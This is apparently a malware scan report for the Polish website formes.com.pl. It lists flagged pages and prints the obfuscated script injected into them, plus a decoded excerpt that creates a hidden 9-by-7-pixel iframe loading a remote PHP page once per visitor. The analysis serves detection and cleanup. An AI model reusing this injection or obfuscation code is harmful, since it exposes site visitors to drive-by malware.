Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=formes.com.pl
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://formes.com.pl/ | 200 OK Content-Length: 7395 Content-Type: text/html | malicious |
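Malicious code - confirmed by antiviruses (see below)
Obfuscated script as served (excerpt; the hex string is cut off):
try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e8075872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e8075873c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e8075873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e8075873c8182877a733c707d807273802e4b2e353e3549182e8075873c8182877a733c7673777576822e4b2e
Decoded script (excerpt):
String String function zzzfff() { var rgy = document.createElement('iframe'); rgy.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; rgy.style.position = 'absolute'; rgy.style.border = '0'; rgy.style.height = '9px'; rgy.style.width = '7px'; rgy.style.left = '1px'; rgy.style.top = '1px'; if (!document.getElementById('rgy')) { document.write('<div id=\'rgy\'></div>'); document.getElementById('rgy').appendChild(rgy); if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } }
Note: the decoded script builds a 9px-by-7px, borderless, absolutely positioned iframe whose source is the third-party URL shown and appends it to the page. It runs only when cookies are enabled and the visited_uq cookie is not already 55, and it calls SetCookie('visited_uq', '55', ...) before injecting, so a browser that has already received the iframe will not receive it again; re-check the page with a fresh cookie jar. The excerpt is incomplete: the decoded text jumps from zzzfff() into the tail of a cookie-reading routine (start, name and len are used without their definitions), so it should not be read as the full script. The same injection is reported for the other flagged URLs below.
Antivirus reports: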
| ||
http://formes.com.pl/indexe.html | 200 OK Content-Length: 9339 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Obfuscated script as served (excerpt; the hex string is cut off):
try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e8075872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e8075873c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e8075873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e8075873c8182877a733c707d807273802e4b2e353e3549182e8075873c8182877a733c7673777576822e4b2e
Decoded script (excerpt):
String String function zzzfff() { var rgy = document.createElement('iframe'); rgy.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; rgy.style.position = 'absolute'; rgy.style.border = '0'; rgy.style.height = '9px'; rgy.style.width = '7px'; rgy.style.left = '1px'; rgy.style.top = '1px'; if (!document.getElementById('rgy')) { document.write('<div id=\'rgy\'></div>'); document.getElementById('rgy').appendChild(rgy); if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } }
Antivirus reports:
| ||
http://formes.com.pl/firmae.html | 200 OK Content-Length: 12368 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Obfuscated script as served (excerpt; the hex string is cut off):
try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e8075872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e8075873c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e8075873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e8075873c8182877a733c707d807273802e4b2e353e3549182e8075873c8182877a733c7673777576822e4b2e
Decoded script (excerpt):
String String function zzzfff() { var rgy = document.createElement('iframe'); rgy.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; rgy.style.position = 'absolute'; rgy.style.border = '0'; rgy.style.height = '9px'; rgy.style.width = '7px'; rgy.style.left = '1px'; rgy.style.top = '1px'; if (!document.getElementById('rgy')) { document.write('<div id=\'rgy\'></div>'); document.getElementById('rgy').appendChild(rgy); if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } }
Antivirus reports:
| ||
http://formes.com.pl/javas.js | 200 OK Content-Length: 4097 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Obfuscated script as served (excerpt; the hex string is cut off):
try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e797173702e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e797173703c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e797173703c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e797173703c8182877a733c707d807273802e4b2e353e3549182e797173703c8182877a733c76737775
Decoded script (excerpt):
String String function zzzfff() { var kceb = document.createElement('iframe'); kceb.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; kceb.style.position = 'absolute'; kceb.style.border = '0'; kceb.style.height = '9px'; kceb.style.width = '7px'; kceb.style.left = '1px'; kceb.style.top = '1px'; if (!document.getElementById('kceb')) { document.write('<div id=\'kceb\'></div>'); document.getElementById('kceb').appendChild if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } }
Note: this copy is served from a script file (Content-Type: application/javascript) and, in the visible excerpt, differs from the copies in the HTML pages only in the variable name (kceb instead of rgy). Pages listed as clean below may still load javas.js, so each should be checked for a reference to it. The excerpt is cut shorter here: both the hex string and the appendChild call are truncated.
Antivirus reports:
| ||
http://formes.com.pl/ofertae.html | 200 OK Content-Length: 10141 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Obfuscated script as served (excerpt; the hex string is cut off):
try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e8075872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e8075873c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e8075873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e8075873c8182877a733c707d807273802e4b2e353e3549182e8075873c8182877a733c7673777576822e4b2e
Decoded script (excerpt):
String String function zzzfff() { var rgy = document.createElement('iframe'); rgy.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; rgy.style.position = 'absolute'; rgy.style.border = '0'; rgy.style.height = '9px'; rgy.style.width = '7px'; rgy.style.left = '1px'; rgy.style.top = '1px'; if (!document.getElementById('rgy')) { document.write('<div id=\'rgy\'></div>'); document.getElementById('rgy').appendChild(rgy); if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } }
Antivirus reports:
| ||
http://formes.com.pl/kontakte.php | 200 OK Content-Length: 7288 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=297&category=16 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=284&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=285&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=286&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=287&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=288&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=289&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=290&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: formes.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 14:09:15 GMT
Server: IdeaWebServer/v0.80
Content-Length: 7395
Content-Type: text/html
Last-Modified: Thu, 08 Aug 2013 02:30:37 GMT
...7395 bytes of data.
GET / HTTP/1.1
Host: formes.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 14:09:15 GMT
Server: IdeaWebServer/v0.80
Content-Length: 7395
Content-Type: text/html
Last-Modified: Thu, 08 Aug 2013 02:30:37 GMT
...7395 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: formes.com.pl
Referer: http://www.google.com/search?q=formes.com.pl
Result:
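The result is similar to the first query. No suspicious redirects were found. This check covers only the two requests shown (one without a Referer and one with a Google search Referer); it does not test other request conditions.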
GET / HTTP/1.1
Host: formes.com.pl
Referer: http://www.google.com/search?q=formes.com.pl
Result:
The result is similar to the first query. No suspicious redirects were found.